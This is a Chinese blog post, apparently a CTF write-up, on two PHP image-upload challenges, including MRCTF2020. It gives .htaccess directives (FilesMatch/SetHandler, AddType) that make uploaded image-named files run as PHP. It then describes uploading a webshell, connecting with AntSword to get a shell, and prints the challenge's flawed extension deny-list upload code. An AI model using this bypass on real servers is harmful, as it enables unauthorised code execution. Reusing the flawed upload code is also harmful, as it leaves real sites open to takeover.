文件上传之图片上传题目

ca12uh

已于 2023-03-17 01:32:08 修改

阅读量183

点赞数

分类专栏：安全文章标签： php

于 2023-03-16 21:20:47 首次发布

本文链接：https://blog.csdn.net/ted_guangda/article/details/129598059

版权

安全专栏收录该内容

2 篇文章 1 订阅

订阅专栏

[A]文件上传之图片上传题目

Give me your photo PLZ

提示

我好想看一些好康的图片呜呜

题目

在这里插入图片描述

.htaccess是Apache的又一特色。一般来说，配置文件的作用范围都是全局的，但Apache提供了一种很方便的、可作用于当前目录及其子目录的配置文件——.htaccess（分布式配置文件）

<FilesMatch "zx"> #文件中含有zx(包括后缀）
SetHandler application/x-httpd-php #当文件名中有zx则以php执行
</FilesMatch>

或者

AddType application/x-httpd-php .jpg #文件后缀为.jpg为php执行

上传 .hataccess文件

在这里插入图片描述

上传zx🐎。

在这里插入图片描述

执行php命令。

在这里插入图片描述

成功getshell，结束，谢谢徐师傅。

最后贴上源码：

<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>文件上传</title>
</head>
<body>
    <h1 align="center">大家好，这是一个不会写前端的web手做的图片渲染器，上传图片，我会帮你渲染出来的</h1>
    <?php
    if(!empty($_FILES)) {
        if ($_FILES["file"]["error"] > 0) {
            echo "错误：" . $_FILES["file"]["error"] . "<br>";
        } else {
            $extension = explode(".", $_FILES["file"]["name"]);
            $extension = ".".strtolower(end($extension));
            $deny_ext = array(".php", ".php5", ".php4", ".php3", ".php2", ".php1", ".html", ".htm", ".phtml", ".pht", ".pHp", ".pHp5", ".pHp4", ".pHp3", ".pHp2", ".pHp1", ".Html", ".Htm", ".pHtml", ".jsp", ".jspa", ".jspx", ".jsw", ".jsv", ".jspf", ".jtml", ".jSp", ".jSpx", ".jSpa", ".jSw", ".jSv", ".jSpf", ".jHtml", ".asp", ".aspx", ".asa", ".asax", ".ascx", ".ashx", ".asmx", ".cer", ".aSp", ".aSpx", ".aSa", ".aSax", ".aScx", ".aShx", ".aSmx", ".cEr", ".sWf", ".swf", ".ini");
            if (in_array($extension, $deny_ext)) {
                exit("上传木马可不是好习惯～～～");
            } else {
                move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . strtolower($_FILES["file"]["name"]));
                echo "<img src='upload/" . strtolower($_FILES["file"]["name"]) . "'>";
            }
        }
    }
    ?>
    <form align="center" method="post" enctype="multipart/form-data">
        <label for="file">文件名：</label>
        <input type="file" name="file" id="file">
        <input type="submit" name="submit" value="提交">
    </form>
</body>
</html>

参考链接

https://blog.csdn.net/qq_61988806/article/details/123245564

[MRCTF2020]你传你🐎呢

在这里插入图片描述

试了下，.htaccess可以上传。

所以上传

<FilesMatch "zx"> #文件中含有zx(包括后缀）
SetHandler application/x-httpd-php #当文件名中有zx则以php执行
</FilesMatch>

上传之后，再上传zx.php。

蚁剑链接即可。

出问题请看：https://blog.csdn.net/weixin_44632787/article/details/118049911

总结：操作不规范，getshell两行泪。

ca12uh

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
文件上传之图片上传题目

我好想看一些好康的图片呜呜。
复制链接

扫一扫

专栏目录